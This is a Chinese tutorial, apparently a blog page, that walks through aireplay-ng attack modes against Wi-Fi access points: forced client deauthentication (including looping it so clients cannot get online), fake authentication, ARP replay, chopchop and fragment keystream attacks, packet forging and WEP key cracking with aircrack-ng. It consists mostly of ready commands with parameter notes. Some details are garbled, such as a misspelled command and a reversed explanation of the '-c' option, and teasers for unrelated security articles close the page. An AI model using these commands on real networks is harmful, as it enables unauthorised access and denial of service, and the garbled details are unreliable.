-0 deautenticate
衝突模式
使已經連線的合法客戶端端強制斷開與路由器的連線,使其重新連線。在重新連線過程中獲得驗證資料報,從而產生有效的
arp資料。
如果乙個客戶端連在路由器上,但是沒有人上網來產生有效資料,此時即使用
-3也無法產生有效的
arp資料,所以就需要用
-0攻擊模式來配合
-3攻擊來會被啟用
aireplay-ng -0 10 -a ap_mac -c
合法客戶端
mac wifi0
引數說明:
10表示傳送次數(設定為
0表示迴圈攻擊,客戶端無法正常上網)
-a設定ap的
mac位址,
-c設定已連線的合法客戶端的
mac位址
(如果要
-c則所有與
ap連線的客戶端全部斷線)
-1 fakeauth count
偽裝乙個客戶端和
ap進行連線
這是沒有客戶端研究學習的第一步,因為是沒有合法連線的客戶端,因此需要乙個偽裝客戶端來和路由器連線。為讓
ap接受資料報,必須使自己的網絡卡和
ap關聯。
-1偽裝客戶端連線成功夠才能用傳送注入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
引數說明:
0表示延遲
0秒後連線;
-e設定
ap_essid;-a
設定ap
的mac
位址-h
設定偽裝客戶端的網絡卡
mac位址(就是自己網絡卡的
mac位址)
-2 interactive
互動模式
這個模式集合了抓包和提取資料,發包注入三種功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
引數說明:
-p設定控制幀中包含的資訊(
16進製制),預設採用
0841;-c
:設定目標
mac位址;
-b設定ap的
mac位址;
-h偽裝的客戶端網絡卡
mac位址(就是自己的
mac位址)
提取包,傳送注入資料報
aireplay-ng -2 -r myarp -x 1024 wifi0
引數說明:
myarp
:自己設定的檔名;
-x1024
:發包的速度(最大為
1024
)-3 arp-request
注入攻擊模式
這種模式是一種抓包後分析重發的過程
aireplay-ng -3 -b ap_mac -h
合法客戶端
mac -x 512 wifi0
-4 chopchop
攻擊模式,用來獲得乙個包含金鑰資料的
xor檔案
aireplay-ng -4 -b ap-mac -h my_mac wifi0
-5 fragment
碎片包攻擊模式,用來獲得
prga
(包含金鑰的字尾為
xor的檔案)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng
資料報製造程式
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l255.255.255.255 -y niam_xor -w mrarp
引數說明:
-0:偽裝
arp資料報;
-k:設定目標檔案
ip和埠;
-l:設定原始檔
ip和埠;
-y:從
xor檔案中讀取
prga
;name
:xor
檔案的名字;
-w設定偽裝的
arp包的檔名
aircrack-ng -n 64 -b ap_mac name-01.ivs
引數說明:
-n設定
key長度(
64/128/256/512
)
Beini 的6種攻擊模式詳解
aireplay ng 的 6 種攻擊模式詳解 0 deautenticate 衝突模式 使已經連線的合法客戶端強制斷開與路由端的連線,使其重新連線。在重新連線過程中獲得驗證資料報,從而產生有效 arp request。如果乙個客戶端連在路由端上,但是沒有人上網以產生有效資料,此時,即使用 3 也無...
有一種攻擊叫彩虹表攻擊
在我們日常系統中,很多都有使用者註冊功能,使用者註冊需要使用者名稱和密碼,密碼一般我們都採用md5加密的方式,但是用md5加密,對於乙個固定的字串,其md5值是固定的,這樣就會出現彩虹表攻擊情況。所謂彩虹表攻擊就是指攻擊者有一張表,裡面有密碼明文和對應md5值的對應關係,攻擊者利用這些關係來破解使用...
揭秘6種最有效的社會工程學攻擊手段及防禦之策
本文講的是揭秘6種最有效的社會工程學攻擊手段及防禦之策,世界第一黑客凱文 公尺特尼克在 欺騙的藝術 中曾提到,人為因素才是安全的軟肋。很多公司在資訊保安上投入重金,最終導致資料洩露的原因卻在人本身。你可能想象不到,對黑客來說,通過網路遠端滲透破解獲得資料,可能是最為麻煩的方法。一種無需電腦網路,更注...